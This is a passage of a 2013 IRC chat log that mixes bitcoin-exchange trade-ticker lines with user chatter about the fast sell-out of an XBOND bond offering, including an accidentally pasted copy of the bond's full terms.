0.001 = 50 BTC Aug 02 20:00:43 [HAVELOCK] [XBOND] 39000 @ 0.001 = 39 BTC Aug 02 20:00:46 [HAVELOCK] [XBOND] 5 @ 0.001 = 0.005 BTC Aug 02 20:00:48 [BTCTC] [BTCGARDEN] 2293 @ 0.016 = 36.688 BTC [+] Aug 02 20:00:49 [HAVELOCK] [XBOND] 2767 @ 0.001 = 2.767 BTC Aug 02 20:00:50 ugh Aug 02 20:00:50 [HAVELOCK] [XBOND] 51 @ 0.001 = 0.051 BTC Aug 02 20:00:52 [HAVELOCK] [XBOND] 1000 @ 0.001 = 1 BTC Aug 02 20:00:54 [HAVELOCK] [XBOND] 800 @ 0.001 = 0.8 BTC Aug 02 20:00:56 [HAVELOCK] [XBOND] 16750 @ 0.001 = 16.75 BTC Aug 02 20:00:59 [HAVELOCK] [XBOND] 8638 @ 0.001 = 8.638 BTC Aug 02 20:01:01 [HAVELOCK] [XBOND] 200 @ 0.001 = 0.2 BTC Aug 02 20:01:03 [HAVELOCK] [XBOND] 200 @ 0.001 = 0.2 BTC Aug 02 20:01:06 [HAVELOCK] [XBOND] 28255 @ 0.001 = 28.255 BTC Aug 02 20:01:08 [HAVELOCK] [XBOND] 69 @ 0.001 = 0.069 BTC Aug 02 20:01:09 I hope I was the first! Aug 02 20:01:10 [HAVELOCK] [XBOND] 30000 @ 0.001 = 30 BTC Aug 02 20:01:11 [HAVELOCK] [XBOND] 1050 @ 0.001 = 1.05 BTC Aug 02 20:01:13 [HAVELOCK] [XBOND] 2022 @ 0.001 = 2.022 BTC Aug 02 20:01:16 [HAVELOCK] [XBOND] 1000 @ 0.001 = 1 BTC Aug 02 20:01:18 [HAVELOCK] [XBOND] 3379 @ 0.001 = 3.379 BTC Aug 02 20:01:20 [HAVELOCK] [XBOND] 99999 @ 0.001 = 99.999 BTC Aug 02 20:01:23 [HAVELOCK] [XBOND] 1000 @ 0.001 = 1 BTC Aug 02 20:01:23 cant get in :O Aug 02 20:01:25 [HAVELOCK] [XBOND] 11000 @ 0.001 = 11 BTC Aug 02 20:01:27 [HAVELOCK] [XBOND] 15000 @ 0.001 = 15 BTC Aug 02 20:01:29 [HAVELOCK] [XBOND] 1000 @ 0.001 = 1 BTC Aug 02 20:01:31 [HAVELOCK] [XBOND] 16 @ 0.001 = 0.016 BTC Aug 02 20:01:32 [HAVELOCK] [XBOND] 100 @ 0.001 = 0.1 BTC Aug 02 20:01:34 https://www.havelockinvestments.com/buyipo.php?symbol=XBOND&id=34 Aug 02 20:01:34 [HAVELOCK] [XBOND] 10000 @ 0.001 = 10 BTC Aug 02 20:01:36 [HAVELOCK] [XBOND] 1800 @ 0.001 = 1.8 BTC Aug 02 20:01:37 Rulother_: what do you mean cant get in? sites fine here Aug 02 20:01:38 [HAVELOCK] [XBOND] 1037 @ 0.001 = 1.037 BTC Aug 02 20:01:40 [HAVELOCK] [XBOND] 900 @ 0.001 = 0.9 BTC Aug 02 20:01:41 Havelock Investments Aug 02 20:01:42 [HAVELOCK] [XBOND] 520 @ 0.001 = 0.52 BTC Aug 02 20:01:44 [HAVELOCK] [XBOND] 10299 @ 0.001 = 10.299 BTC Aug 02 20:01:46 [HAVELOCK] [XBOND] 1466 @ 0.001 = 1.466 BTC Aug 02 20:01:46 will not load for me :) Aug 02 20:01:48 [HAVELOCK] [XBOND] 159 @ 0.001 = 0.159 BTC Aug 02 20:01:49 sites down Aug 02 20:01:50 [HAVELOCK] [XBOND] 1600 @ 0.001 = 1.6 BTC Aug 02 20:01:52 [HAVELOCK] [XBOND] 10 @ 0.001 = 0.01 BTC Aug 02 20:01:53 [HAVELOCK] [XBOND] 3000 @ 0.001 = 3 BTC Aug 02 20:01:55 [HAVELOCK] [XBOND] 75 @ 0.001 = 0.075 BTC Aug 02 20:01:56 still fine here Aug 02 20:01:57 [HAVELOCK] [XBOND] 3500 @ 0.001 = 3.5 BTC Aug 02 20:01:59 wow it's going fast Aug 02 20:01:59 [HAVELOCK] [XBOND] 561 @ 0.001 = 0.561 BTC Aug 02 20:02:01 [HAVELOCK] [XBOND] 1000 @ 0.001 = 1 BTC Aug 02 20:02:03 [BTCTC] [LABCOIN] 400 @ 0.00181 = 0.724 BTC [+] Aug 02 20:02:04 [HAVELOCK] [XBOND] 150 @ 0.001 = 0.15 BTC Aug 02 20:02:06 [BTCTC] [LABCOIN] 2600 @ 0.001806 = 4.6956 BTC [-] Aug 02 20:02:07 [HAVELOCK] [XBOND] 7275 @ 0.001 = 7.275 BTC Aug 02 20:02:09 [HAVELOCK] [XBOND] 1000 @ 0.001 = 1 BTC Aug 02 20:02:10 [HAVELOCK] [XBOND] 1450 @ 0.001 = 1.45 BTC Aug 02 20:02:12 [HAVELOCK] [XBOND] 5000 @ 0.001 = 5 BTC Aug 02 20:02:14 [HAVELOCK] [XBOND] 269 @ 0.001 = 0.269 BTC Aug 02 20:02:16 [HAVELOCK] [XBOND] 10 @ 0.001 = 0.01 BTC Aug 02 20:02:18 [HAVELOCK] [XBOND] 2000 @ 0.001 = 2 BTC Aug 02 20:02:20 [HAVELOCK] [XBOND] 2000 @ 0.001 = 2 BTC Aug 02 20:02:22 [HAVELOCK] [XBOND] 950 @ 0.001 = 0.95 BTC Aug 02 20:02:24 [HAVELOCK] [XBOND] 982 @ 0.001 = 0.982 BTC Aug 02 20:02:26 [HAVELOCK] [XBOND] 1 @ 0.001 BTC Aug 02 20:02:28 [HAVELOCK] [XBOND] 8 @ 0.001 = 0.008 BTC Aug 02 20:02:30 [BTCTC] [LABCOIN] 1 @ 0.0019 BTC [+] Aug 02 20:02:30 [HAVELOCK] [XBOND] 143 @ 0.001 = 0.143 BTC Aug 02 20:02:33 [HAVELOCK] [XBOND] 79 @ 0.001 = 0.079 BTC Aug 02 20:02:36 [HAVELOCK] [XBOND] 100 @ 0.001 = 0.1 BTC Aug 02 20:02:38 [HAVELOCK] [XBOND] 1680 @ 0.001 = 1.68 BTC Aug 02 20:02:41 [HAVELOCK] [XBOND] 3090 @ 0.001 = 3.09 BTC Aug 02 20:02:43 [HAVELOCK] [XBOND] 120 @ 0.001 = 0.12 BTC Aug 02 20:02:46 [BTCTC] [BTCGARDEN] 29 @ 0.016 = 0.464 BTC [+] Aug 02 20:02:47 [HAVELOCK] [XBOND] 914 @ 0.001 = 0.914 BTC Aug 02 20:02:48 so what's this, like 500 btc ? Aug 02 20:02:49 [HAVELOCK] [XBOND] 28 @ 0.001 = 0.028 BTC Aug 02 20:02:52 [HAVELOCK] [XBOND] 500 @ 0.001 = 0.5 BTC Aug 02 20:02:54 [HAVELOCK] [XBOND] 9 @ 0.001 = 0.009 BTC Aug 02 20:02:55 yes Aug 02 20:02:56 [HAVELOCK] [XBOND] 40 @ 0.001 = 0.04 BTC Aug 02 20:02:57 [HAVELOCK] [XBOND] 5000 @ 0.001 = 5 BTC Aug 02 20:03:01 4 tranches of 500btc Aug 02 20:03:01 [HAVELOCK] [XBOND] 4700 @ 0.001 = 4.7 BTC Aug 02 20:03:03 [HAVELOCK] [XBOND] 2000 @ 0.001 = 2 BTC Aug 02 20:03:05 [HAVELOCK] [XBOND] 1 @ 0.001 BTC Aug 02 20:03:08 [HAVELOCK] [XBOND] 7000 @ 0.001 = 7 BTC Aug 02 20:03:10 [HAVELOCK] [XBOND] 6 @ 0.001 = 0.006 BTC Aug 02 20:03:10 so you get 18% apy, and they can buy back at 0.00105 at any time? Aug 02 20:03:12 [HAVELOCK] [XBOND] 40 @ 0.001 = 0.04 BTC Aug 02 20:03:14 [HAVELOCK] [XBOND] 1000 @ 0.001 = 1 BTC Aug 02 20:03:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.04095 = 0.0819 BTC [+] Aug 02 20:03:16 [HAVELOCK] [XBOND] 1000 @ 0.001 = 1 BTC Aug 02 20:03:18 there will be 4 xbonds? Aug 02 20:03:18 [HAVELOCK] [XBOND] 100 @ 0.001 = 0.1 BTC Aug 02 20:03:20 [HAVELOCK] [XBOND] 1000 @ 0.001 = 1 BTC Aug 02 20:03:22 [HAVELOCK] [LABCO] 1 @ 0.0022 BTC [+] Aug 02 20:03:24 [HAVELOCK] [XBOND] 560 @ 0.001 = 0.56 BTC Aug 02 20:03:27 [HAVELOCK] [XBOND] 9 @ 0.001 = 0.009 BTC Aug 02 20:03:29 [HAVELOCK] [XBOND] 110 @ 0.001 = 0.11 BTC Aug 02 20:03:31 [HAVELOCK] [XBOND] 5000 @ 0.001 = 5 BTC Aug 02 20:03:34 [HAVELOCK] [XBOND] 7000 @ 0.001 = 7 BTC Aug 02 20:03:36 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 20:03:36 [HAVELOCK] [XBOND] 5000 @ 0.001 = 5 BTC Aug 02 20:03:39 [HAVELOCK] [XBOND] 45 @ 0.001 = 0.045 BTC Aug 02 20:03:41 [HAVELOCK] [XBOND] 10000 @ 0.001 = 10 BTC Aug 02 20:03:44 [HAVELOCK] [XBOND] 5 @ 0.001 = 0.005 BTC Aug 02 20:03:46 [HAVELOCK] [XBOND] 54 @ 0.001 = 0.054 BTC Aug 02 20:03:48 [HAVELOCK] [XBOND] 500 @ 0.001 = 0.5 BTC Aug 02 20:03:50 [HAVELOCK] [XBOND] 3 @ 0.001 = 0.003 BTC Aug 02 20:03:51 going to 1btc a share Aug 02 20:03:52 [HAVELOCK] [XBOND] 50 @ 0.001 = 0.05 BTC Aug 02 20:03:54 [HAVELOCK] [XBOND] 3000 @ 0.001 = 3 BTC Aug 02 20:03:56 [HAVELOCK] [XBOND] 38 @ 0.001 = 0.038 BTC Aug 02 20:03:58 [HAVELOCK] [XBOND] 632 @ 0.001 = 0.632 BTC Aug 02 20:04:05 [HAVELOCK] [XBOND] 150 @ 0.001 = 0.15 BTC Aug 02 20:04:08 [HAVELOCK] [XBOND] 4 @ 0.001 = 0.004 BTC Aug 02 20:04:11 [BTCTC] [LABCOIN] 992 @ 0.001901 = 1.8858 BTC [+] Aug 02 20:04:12 [BTCTC] [LABCOIN] 2101 @ 0.001949 = 4.0948 BTC [+] Aug 02 20:04:13 [BTCTC] [LABCOIN] 12608 @ 0.00195 = 24.5856 BTC [+] Aug 02 20:04:15 almost sold out Aug 02 20:04:15 [HAVELOCK] [XBOND] 1000 @ 0.001 = 1 BTC Aug 02 20:04:17 [HAVELOCK] [XBOND] 2000 @ 0.001 = 2 BTC Aug 02 20:04:20 [HAVELOCK] [XBOND] 1600 @ 0.001 = 1.6 BTC Aug 02 20:04:28 [HAVELOCK] [XBOND] 10 @ 0.001 = 0.01 BTC Aug 02 20:04:34 [HAVELOCK] [XBOND] 16 @ 0.001 = 0.016 BTC Aug 02 20:04:36 [HAVELOCK] [XBOND] 100 @ 0.001 = 0.1 BTC Aug 02 20:04:38 [HAVELOCK] [XBOND] 1 @ 0.001 BTC Aug 02 20:04:41 [HAVELOCK] [XBOND] 100 @ 0.001 = 0.1 BTC Aug 02 20:04:46 [BTCTC] [BTCGARDEN] 12 @ 0.016 = 0.192 BTC [+] Aug 02 20:04:46 No fees?? Aug 02 20:04:48 [HAVELOCK] [XBOND] 10 @ 0.001 = 0.01 BTC Aug 02 20:04:51 [HAVELOCK] [XBOND] 100 @ 0.001 = 0.1 BTC Aug 02 20:04:52 Shit Aug 02 20:04:53 [HAVELOCK] [XBOND] 10 @ 0.001 = 0.01 BTC Aug 02 20:04:54 I was only third :/ hoped to be the first Aug 02 20:05:00 [HAVELOCK] [XBOND] 10 @ 0.001 = 0.01 BTC Aug 02 20:05:01 holy moley Aug 02 20:05:03 [HAVELOCK] [XBOND] 20 @ 0.001 = 0.02 BTC Aug 02 20:05:06 [HAVELOCK] [XBOND] 27 @ 0.001 = 0.027 BTC Aug 02 20:05:09 [HAVELOCK] [XBOND] 2 @ 0.001 = 0.002 BTC Aug 02 20:05:10 that went fast as shit Aug 02 20:05:14 [BTCTC] [ACTIVEMINING] 25 @ 0.005713 = 0.1428 BTC [+] Aug 02 20:05:15 [BTCTC] [ACTIVEMINING] 50 @ 0.005712 = 0.2856 BTC [-] Aug 02 20:05:22 [HAVELOCK] [XBOND] 2 @ 0.001 = 0.002 BTC Aug 02 20:05:31 tranche 1 gone Aug 02 20:06:10 hahaha I'm getting the IPO mail right after it's sold out Aug 02 20:06:25 anyone want some xbond for .1 btc? Aug 02 20:07:06 :P Aug 02 20:07:08 VanCleef: for 0.1 how many do we get? Aug 02 20:07:08 [HAVELOCK] [AM100] 5 @ 0.0379 = 0.1895 BTC [+] Aug 02 20:07:14 i almost lost out... bought 16 shares by accedent instead of 1600 Aug 02 20:07:23 [BTCTC] [BTCGARDEN] 2000 @ 0.016 = 32 BTC [+] Aug 02 20:07:27 just 1 Aug 02 20:07:32 hahaha yeah! Aug 02 20:07:38 won't they buy them back if it goes over 0.00105? Aug 02 20:07:57 Topace , did it sell out already - or is there more being released? Aug 02 20:08:03 [BTCTC] [ASICMINER-PT] 6 @ 4.111 = 24.666 BTC [-] Aug 02 20:08:04 [BTCTC] [ASICMINER-PT] 7 @ 4.11 = 28.77 BTC [-] Aug 02 20:08:06 [BTCTC] [ASICMINER-PT] 3 @ 4.1 = 12.3 BTC [-] Aug 02 20:08:07 1st tranche sold out Aug 02 20:08:15 3 more to go? Aug 02 20:08:20 thats the plan Aug 02 20:08:27 not sure of the timing yet, have to wait on TAT to announce Aug 02 20:08:28 [HAVELOCK] [AM100] 1 @ 0.0379 BTC [+] Aug 02 20:08:46 [BTCTC] [BTCGARDEN] 3125 @ 0.016 = 50 BTC [+] Aug 02 20:09:02 [HAVELOCK] [AM100] 2 @ 0.0379 = 0.0758 BTC [+] Aug 02 20:09:40 This might be one of the things that gets havelock to take off Aug 02 20:10:23 [BTCTC] [BASIC-MINING] 1 @ 0.435 BTC [-] Aug 02 20:10:24 [BTCTC] [BASIC-MINING] 10 @ 0.4321 = 4.321 BTC [-] Aug 02 20:10:26 [BTCTC] [BASIC-MINING] 14 @ 0.432 = 6.048 BTC [-] Aug 02 20:10:29 Rulother_: not botching an IPO? or the bodn itself? :p Aug 02 20:10:31 heh Aug 02 20:10:32 got 1000 for .1 btc each if you don't want to wait Aug 02 20:11:07 dont miss out on the next labcoin Aug 02 20:11:12 lol tat ping-timed-out just after it neded Aug 02 20:11:13 lol Aug 02 20:11:13 ended Aug 02 20:11:24 O I got my order in alright Aug 02 20:11:25 i got 1500 for .0999 haha Aug 02 20:11:26 Announcing the upcoming public offering for XBOND - Exchangeable Fixed-Rate Bond (XBOND) Aug 02 20:11:26 On Friday, August 2nd, 2013 at 1:00PM (EST), a public offering will open for XBOND - Exchangeable Fixed-Rate Bond. Aug 02 20:11:26 Total Units: 500000 Aug 02 20:11:26 Maximum Units Per User: 100000 Aug 02 20:11:27 Price: 0.001BTC/unit Aug 02 20:11:28 Fund Overview: https://www.havelockinvestments.com/fund.php?symbol=XBOND Aug 02 20:11:30 XBOND Aug 02 20:11:32 Exchangeable Bond Offering Aug 02 20:11:34 Overview Aug 02 20:11:36 XBOND is a “perpetual” fixed-yield bond (0.05% Daily, 18.25% APY) issued by TAT Investments with special redemption privileges, callability and putability terms. Aug 02 20:11:39 This asset is being offered for the following purposes: Aug 02 20:11:41 1. To increase TAT Investments' ability to provide new public offerings Aug 02 20:11:43 2. To provide Pre-IPO Placement access to upcoming public offerings issued by TAT Investments Aug 02 20:11:45 These offerings may include stocks, bonds, futures and other investment opportunities. Aug 02 20:11:47 3. To improve TAT investments' financial agility Aug 02 20:11:49 Dividends (Daily Coupon) Aug 02 20:11:52 This bond pays a fixed-rate daily coupon, or interest rate, of 0.05% (18.25% APY). Each coupon will be scheduled to payout daily at 12:00 pm EST, unless the host exchange has technical issues, in which case the payments will occur at the earliest time possible. Aug 02 20:11:57 Face Value Aug 02 20:11:59 Each bond has a face value of 0.001 bitcoins. Aug 02 20:12:01 Initial Public Offering Aug 02 20:12:03 why dafuq are you pasting that here... Aug 02 20:12:04 The initial public offering will be sold in 4 tranches of 500,000 units each, at a price of 0.001 bitcoins per unit. (2,000,000 units, totaling 2,000btc). Aug 02 20:12:06 If a tranche remains unsold after 1 week, the remaining unsold tranches may be removed and placed for sale on another exchange. Additional bonds may be issued in the future if proper backing is in place. Aug 02 20:12:09 Backing Aug 02 20:12:11 TAT Investments will always reserve a portion of its bitcoin-denominated holdings with a market value that is greater than 100% of the face value of our issued debt in bonds Aug 02 20:12:14 Any equities assigned as backing to these bonds will be otherwise unencumbered from any liabilities to other securities provided by TAT Investments. Aug 02 20:12:17 Backing equity will be held in publicly verifiable accounts, and a quarterly transparency report will be provided to detail all backing assets. TAT Investments may use bitcoins or any publicly traded bitcoin security assets as backing. Aug 02 20:12:19 kick or he will paste the entire post Aug 02 20:12:21 Bond Redemption (Putability) Aug 02 20:12:23 These bonds may be redeemed in two ways: Aug 02 20:12:27 1. Pre-IPO Redemption: These bonds may exchanged at the full face value, 0.001 bitcoins each, toward the purchase of newly announced public offerings provided by TAT Investments. XBOND holders will have first access to units of any eligible IPO we provide, before open market trading begins, on a first come, first served basis. Aug 02 20:12:30 some people share too much Aug 02 20:12:31 Pre-IPO Redemption Rules: Aug 02 20:12:33 oh my lord Aug 02 20:12:33 - To instigate a redemption exchange for Pre-IPO purchases, simply transfer your bonds to the tat.investments@gmail.com account within HavelockInvestments.com, Also, please send a corresponding email to tat.investments@gmail.com confirming your desired Pre-IPO purchase details. Aug 02 20:12:35 lol wtf Aug 02 20:12:37 - Pre-IPO exchanges will be fulfilled in the order that the full transfer is received. Aug 02 20:12:39 - Pre-IPO purchases must be paid in full by redeeming XBOND units. Aug 02 20:12:40 lol accidental copy/paste probably Aug 02 20:12:40 Agreed Aug 02 20:12:42 - If an IPO is sold out through bond redemptions, any unfulfilled redemption requests will be sent back to the original bondholder. Aug 02 20:12:44 - Once a redemption request is received it is binding. Aug 02 20:12:46 [BTCTC] [COGNITIVE] 3 @ 0.509 = 1.527 BTC [-] Aug 02 20:12:47 - Pre-IPO shares will provided within 3 days after the IPO. Aug 02 20:12:48 opps Aug 02 20:12:49 2. Direct Redemption: Bonds may be redeemed at any time at 95% of face value, 0.00095 for each bond. Please allow 1-3 days for redemptions worth less than 10 bitcoins; 1-15 days for redemptions worth 10-50 bitcoins; 1-30 days for redemptions worth 50-100 bitcoins. Turnaround time for larger direct redemptions will be quoted on a case-by-case basis. Any bondholder may sell their XBOND unit Aug 02 20:12:53 omg Aug 02 20:12:54 s on the host exchange. Bondholders may instigate a maximum of one redemption request per week. Aug 02 20:12:57 Bond Recall (Callability) Aug 02 20:12:59 Bonds cannot be recalled during Pre-IPO sales periods. These bonds may be recalled by the issuer at any other time at 105% of face value, 0.00105 bitcoins each. Aug 02 20:13:02 hahaha Aug 02 20:13:02 The issuer has the right to recall any outstanding bonds at will. If TAT Investments recalls only a portion all outstanding bonds, we will do so as proportionally among all bondholders, rounded down to the nearest whole unit. Aug 02 20:13:07 Voting Rights Aug 02 20:13:08 there can't be much left Aug 02 20:13:08 There are no voting rights associated with these bonds. Aug 02 20:13:10 good thing they weren't reading Moby Dick Aug 02 20:13:10 Reserved Rights Aug 02 20:13:11 ./ipobot.sh? Aug 02 20:13:13 Issuer reserves the following rights: Aug 02 20:13:14 1. To issue additional bonds publicly or privately (the quantity of total outstanding bonds will always be made public) Aug 02 20:13:17 hahahaha! Aug 02 20:13:17 2. To buy or sell bonds publicly or privately (the quantity of total outstanding bonds will always be made public) Aug 02 20:13:20 almost there Aug 02 20:13:21 3. To make changes to this contract that represent the best of interests of bondholders Aug 02 20:13:22 4. To correct and clarify any gross errors or details herein that prove to be open to misinterpretation Aug 02 20:13:27 5. To temporarily or permanently assign additional rights or privileges to bondholders. Aug 02 20:13:29 6. To permanently increase the daily interest rate of all outstanding bonds Aug 02 20:13:30 lol awwwwkarrrrd Aug 02 20:13:31 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 02 20:13:31 7. To limit frequent, abusive redemption requests Aug 02 20:13:33 8. To specify minimum or maximum redemption terms and eligibility for Pre-IPO redemptions Aug 02 20:13:35 Dissolution Aug 02 20:13:37 In the event that the issuer chooses to, or is forced to, close this asset for any reason, a new operator may be vetted and chosen by TAT Investments to take over control of the asset, or all bonds will be bought back by the issuer at 105% of face value. Daily coupons remain due every day until such time as TAT Investments is able to make such a final payment. Aug 02 20:13:38 Ugh Aug 02 20:13:39 okey we get it Aug 02 20:13:40 how is there no mods in here Aug 02 20:13:42 Issuer Info Aug 02 20:13:44 TAT Investments is a leading bitcoin investment company with a mission to provide highly desirable offerings to bitcoin investors in new ways, and to set higher standards for bitcoin investments. Aug 02 20:13:45 make sure to get the disclaimers in there at the end Aug 02 20:13:47 Elec died Aug 02 20:13:48 TAT Investments has provided identity information to the host exchange privately as a gesture of good faith, as well as emergency contact information. Aug 02 20:13:50 hahaha Aug 02 20:13:50 spam? Aug 02 20:13:50 A “dead man’s switch” will be implemented in order to pass control of this asset to a safe secondary operator in the case of the issuer’s untimely demise or hospitalization. Aug 02 20:13:52 thank you ipo bot Aug 02 20:13:54 Official Forum Thread: https://bitcointalk.org/index.php?topic=265287.0 Aug 02 20:13:57 IRC: on Freenode, ThickAsThieves Aug 02 20:13:59 E-mail: tat.investments@gmail.com Aug 02 20:14:01 :D VanCleef Aug 02 20:14:01 Disclaimer & Risks Aug 02 20:14:03 Bitcoin’s legal definition as a currency, commodity, investment, or financial instrument may be subject to unique regulations in some jurisdictions. The issuance of bitcoin-denominated securities may be considered high-risk in the current environment. Please perform due diligence in all of your investment decisions, and consider all risks before purchase. Aug 02 20:14:06 I'm blaming you tat Aug 02 20:14:08 reminds me of #bitcoin in the heyday Aug 02 20:14:08 While all investments involve risk, bitcoin securities may be considered among the most risky. Some have products and services that are still in development or have yet to be tested in the market. Many trade on unregistered exchanges. Aug 02 20:14:12 shameless plug for TAT, he organized this Aug 02 20:14:12 Another risk that pertains to bitcoin securities involves the low volumes of trades. Because most bitcoin securities trade in low volumes, any size of trade can have a large percentage impact on the market price of the security. Aug 02 20:14:16 Losses caused by default/theft within the host exchange may affect the putability and/or the degree of backing representing this security. Aug 02 20:14:17 yep Aug 02 20:14:20 whoops Aug 02 20:14:22 accident Aug 02 20:14:23 sorry Aug 02 20:14:24 Sure sure Aug 02 20:14:26 wtf Aug 02 20:14:27 I need to slap myself Aug 02 20:14:28 i want to do /ignore but its entertaining Aug 02 20:14:28 you don't say Aug 02 20:14:32 plz dont right click again Aug 02 20:14:32 What did i miss? Aug 02 20:14:43 Hollywoodundead: was that some sort of IRC IPO? Aug 02 20:14:46 [BTCTC] [ACTIVEMINING] 10 @ 0.00571 = 0.0571 BTC [-] Aug 02 20:14:47 lol TATphone great time for your internet to die :p Aug 02 20:14:51 oh man baby seal Aug 02 20:14:54 I fucked up and copy pasted Aug 02 20:14:56 that takes me back Aug 02 20:14:58 Sry Aug 02 20:14:59 clearly Aug 02 20:15:05 jesus hollwoodundead Aug 02 20:15:08 TATphone: let me just copy and paste it... Aug 02 20:15:09 Hollywoodundead: that's when you turn off your wifi switch Aug 02 20:15:14 why didn't you alit+f4? Aug 02 20:15:22 he needs to go back to the IRC class for dummies! Aug 02 20:15:23 :D Aug 02 20:15:27 lol Aug 02 20:15:29 or cut the main breaker Aug 02 20:15:31 idiot man Aug 02 20:15:37 hold down the power button Aug 02 20:15:40 just sat there watching it like a dickhead yeh? Aug 02 20:15:41 why didn't you alit+f4? // cause he don't get it Aug 02 20:15:50 hey, at least I didn't copy paste my private key Aug 02 20:15:57 like they do in otc Aug 02 20:15:58 that would have been worth something Aug 02 20:16:07 15 million electrons died to give you that post Aug 02 20:16:09 Did the ipo die? Aug 02 20:16:13 yes Aug 02 20:16:18 hollwood killed it Aug 02 20:16:23 nobody's trading anymre Aug 02 20:16:25 overkill Aug 02 20:16:26 selling everything now Aug 02 20:16:27 6 minutes Aug 02 20:16:28 It sold out Aug 02 20:16:29 TATphone: no? it went flawlessly Aug 02 20:16:35 yep, its in the negative now, you owe us Aug 02 20:16:44 ^ yep Aug 02 20:16:47 [HAVELOCK] [LABCO] 100 @ 0.0022 = 0.22 BTC [+] Aug 02 20:16:52 [MPEX] [S.MPOE] 1716 @ 0.0008187 = 1.4049 BTC [+] Aug 02 20:16:59 dont release anymore for a week plz, selling for .1 btc Aug 02 20:17:24 kthx Aug 02 20:17:40 VanCleef, you really expect 10000% profit in minutes ? Aug 02 20:17:44 you can't sell them for now Aug 02 20:17:44 dude VanCleef, you fucking scammor, someone will always sell lower than you Aug 02 20:17:47 [HAVELOCK] [SMG] 60 @ 0.00024669 = 0.0148 BTC [+] Aug 02 20:17:52 yes Aug 02 20:17:53 obviously Aug 02 20:17:55 its justified Aug 02 20:18:09 based on labcoin and btcgarden valuations Aug 02 20:18:15 those are stocks Aug 02 20:18:15 tat is worth 1 billion bitcoins Aug 02 20:18:21 If everyone can please forget that I did that, I appreciate it. Please delete from your log and I will go hide now Aug 02 20:18:44 VanCleef stop being a bad troll, use some finesse. Aug 02 20:18:51 Hollywoodundead: actually it was good comic relief Aug 02 20:19:07 [HAVELOCK] [SMG] 30 @ 0.00024669 = 0.0074 BTC [+] Aug 02 20:19:11 heh, its always like that at 4am :P Aug 02 20:19:18 [BTCTC] [BTCGARDEN] 1500 @ 0.016 = 24 BTC [+] Aug 02 20:19:33 made all the better by lack of ops Aug 02 20:20:53 now i think you should release xbond 2.0 where you can trade at ANYTIME for another TAT assett Aug 02 20:22:27 [HAVELOCK] [SMG] 8 @ 0.00024669 = 0.002 BTC [+] Aug 02 20:23:06 theives is going to disneyworld now Aug 02 20:23:26 TAT = PIRATE?! Aug 02 20:23:29 what was that 50k? Aug 02 20:23:33 [HAVELOCK] [LABCO] 49 @ 0.0022 = 0.1078 BTC [+] Aug 02 20:23:36 Wild0wnes: yea 500BTC Aug 02 20:23:40 ~$50,000 Aug 02 20:23:51 thats a good hourly rate Aug 02 20:23:59 10k/minute Aug 02 20:24:25 ima make WilBonds... whos in? Aug 02 20:24:43 the fatter I get the more they worth Aug 02 20:24:44 If you rename them WildBonds I'm in. Aug 02 20:24:46 hope he takes me to SatoshiIsland oneday Aug 02 20:24:52 [HAVELOCK] [LABCO] 150 @ 0.0022 = 0.33 BTC [+] Aug 02 20:25:06 whoa scrollback Aug 02 20:25:19 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 02 20:25:32 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 02 20:25:36 did you guys see the thing about kim@satoshidice.com? Aug 02 20:25:51 whitelisted in bitcointalk Aug 02 20:25:57 [HAVELOCK] [XBOND] 200 @ 0.0011 = 0.22 BTC [+] Aug 02 20:25:58 last night Aug 02 20:25:59 [HAVELOCK] [XBOND] 5 @ 0.001001 = 0.005 BTC [-] Aug 02 20:26:01 [HAVELOCK] [XBOND] 71 @ 0.001 = 0.071 BTC [-] Aug 02 20:26:10 kim dot com? Aug 02 20:26:17 [HAVELOCK] [XBOND] 300 @ 0.001 = 0.3 BTC [-] Aug 02 20:26:27 second tranche is up Aug 02 20:26:31 [BTCTC] [TAT.ASICMINER] 12 @ 0.04005 = 0.4806 BTC [-] Aug 02 20:26:32 Wild0wnes yeah. Aug 02 20:26:32 on the OPEN MARKET Aug 02 20:26:32 [BTCTC] [TAT.ASICMINER] 19 @ 0.04005 = 0.761 BTC [-] Aug 02 20:26:35 whats the point of selling back at same price? Aug 02 20:26:36 [HAVELOCK] [XBOND] 25000 @ 0.001 = 25 BTC [-] Aug 02 20:26:38 (not the public offering tab) Aug 02 20:26:43 [HAVELOCK] [XBOND] 140 @ 0.001 = 0.14 BTC [-] Aug 02 20:26:48 [HAVELOCK] [XBOND] 100 @ 0.001 = 0.1 BTC [-] Aug 02 20:26:52 [HAVELOCK] [XBOND] 999 @ 0.001 = 0.999 BTC [-] Aug 02 20:27:08 [HAVELOCK] [XBOND] 119 @ 0.001 = 0.119 BTC [-] Aug 02 20:27:09 oooh yeah funny business afoot... Aug 02 20:27:12 [HAVELOCK] [XBOND] 1 @ 0.001 BTC [-] Aug 02 20:27:15 [HAVELOCK] [SDSTM] 1 @ 0.0083099 BTC [-] Aug 02 20:27:21 [HAVELOCK] [XBOND] 1500 @ 0.001 = 1.5 BTC [-] Aug 02 20:27:23 [HAVELOCK] [XBOND] 1 @ 0.001 BTC [-] Aug 02 20:27:25 buyers remorse Aug 02 20:27:35 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 02 20:27:41 [HAVELOCK] [XBOND] 50 @ 0.001 = 0.05 BTC [-] Aug 02 20:27:44 [HAVELOCK] [XBOND] 100 @ 0.001 = 0.1 BTC [-] Aug 02 20:27:46 [HAVELOCK] [XBOND] 20 @ 0.001 = 0.02 BTC [-] Aug 02 20:27:59 Posted more sry for delay Aug 02 20:27:59 Ah I see, I missed some details. Aug 02 20:28:00 [HAVELOCK] [VTX] 3 @ 0.4521001 = 1.3563 BTC [+] Aug 02 20:28:08 [HAVELOCK] [SMG] 58 @ 0.00024669 = 0.0143 BTC [+] Aug 02 20:28:11 [BTCTC] [LABCOIN] 16 @ 0.001853 = 0.0296 BTC [-] Aug 02 20:28:12 [BTCTC] [LABCOIN] 7 @ 0.00185 = 0.013 BTC [-] Aug 02 20:28:14 [BTCTC] [LABCOIN] 3323 @ 0.001825 = 6.0645 BTC [-] Aug 02 20:28:14 [BTCTC] [LABCOIN] 1000 @ 0.001824 = 1.824 BTC [-] Aug 02 20:28:15 [BTCTC] [LABCOIN] 5647 @ 0.001821 = 10.2832 BTC [-] Aug 02 20:28:16 [HAVELOCK] [XBOND] 39 @ 0.001 = 0.039 BTC [-] Aug 02 20:28:30 [HAVELOCK] 